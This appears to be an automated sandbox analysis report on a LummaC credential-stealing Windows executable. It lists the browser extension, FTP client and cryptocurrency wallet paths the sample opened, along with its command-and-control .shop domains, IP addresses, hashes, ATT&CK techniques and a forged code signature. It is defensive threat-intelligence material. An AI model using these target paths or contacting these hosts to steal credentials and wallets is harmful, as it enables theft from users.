Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior

Source: Yara match	File source: 00000003.00000003.2181607562.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2181670779.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UhsjR3ZFTD.exe PID: 3960, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: UhsjR3ZFTD.exe PID: 3960, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	43 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
UhsjR3ZFTD.exe	32%	ReversingLabs
UhsjR3ZFTD.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://fancywaxxers.shop/apid	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiM	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/apixt.default-release/key4.dbPK	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/apil	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiE	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/apitPK	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/9	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	104.21.32.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
fancywaxxers.shop	false	high
rabidcowse.shop	false	high
wholersorie.shop	false	high
cloudewahsj.shop	false	high
noisycuttej.shop	false	high
nearycrepso.shop	false	high
https://fancywaxxers.shop/api	false	high
framekgirus.shop	false	high
tirepublicerj.shop	false	high
abruptyopsn.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/apixt.default-release/key4.dbPK	UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apid	UhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005450000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.entrust.net03	UhsjR3ZFTD.exe	false		high
http://ocsp.entrust.net02	UhsjR3ZFTD.exe	false		high
https://fancywaxxers.shop/apiM	UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/apil	UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&re	UhsjR3ZFTD.exe, 00000003.00000003.2191772467.0000000005448000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2170745627.0000000005445000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2169941654.0000000005441000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/ts1ca.crl0	UhsjR3ZFTD.exe	false		high
https://support.mozilla.org/products/firefoxgro.all	UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	UhsjR3ZFTD.exe, 00000003.00000003.2158920512.000000000545D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/api	UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E73000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.entrust.net/rpa03	UhsjR3ZFTD.exe	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aia.entrust.net/ts1-chain256.cer01	UhsjR3ZFTD.exe	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/apitPK	UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apiE	UhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/9	UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/	UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227208638.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181347543.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227144209.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E6C000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005459000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217324289.0000000002EE7000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2228040812.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191841142.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	UhsjR3ZFTD.exe	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.entrust.net/rpa0	UhsjR3ZFTD.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.32.1	fancywaxxers.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583096
Start date and time:	2025-01-01 22:04:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	UhsjR3ZFTD.exe renamed because original name is a hash value
Original Sample Name:	639a67914a8e386632cee14f4694015aa7ae186666173159eb171233364f7620.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 48 Number of non-executed functions: 148
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.242.39.171, 2.22.50.131, 2.22.50.144, 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: UhsjR3ZFTD.exe

Simulations

Behavior and APIs

Time	Type	Description
16:04:56	API Interceptor	8x Sleep call for process: UhsjR3ZFTD.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.32.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.112.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	104.21.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	544WP3NHaP.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198
	KRNL.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	01012025.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.198.102
	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	104.21.21.16
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	104.21.21.16
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	188.114.96.3
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	104.21.21.16
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	KRNL.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.32.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	qnUFsmyxMm.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	yTcaknrrb8.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.32.1

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.82486074666969
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	UhsjR3ZFTD.exe
File size:	835'112 bytes
MD5:	51648584ffb4a6398eb1cef4da20e457
SHA1:	74f2facfc001a0b4f23b8d4ce24208aa0c5f84e2
SHA256:	639a67914a8e386632cee14f4694015aa7ae186666173159eb171233364f7620
SHA512:	c77036be9e73e12b43f02fd48dbe4f49469f0a21baf83bf23d43bb6678a52e4702cacaa05baeb189e10726ce1d5797b67d3bf8f98844632c04913ec3df46acfa
SSDEEP:	24576:5B2uFkvh/nrd8NhhG5idard8NhhG5idct:5B2lneh8eaeh8e0
TLSH:	8905022274D0C072ED63253798F99BBA962EA9510B219CCF47884F6A8F713C19B3475F
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Bug.................H..........@.............@.......................................@.....................................(..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40a340
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x677542F8 [Wed Jan 1 13:28:24 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	3ccbd572e5c574aa059c8de8b80553b8

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
call 00007EFFBCBFFE9Ah
jmp 00007EFFBCBFFCFDh
mov ecx, dword ptr [004307C0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007EFFBCBFFE96h
test esi, ecx
jne 00007EFFBCBFFEB8h
call 00007EFFBCBFFEC1h
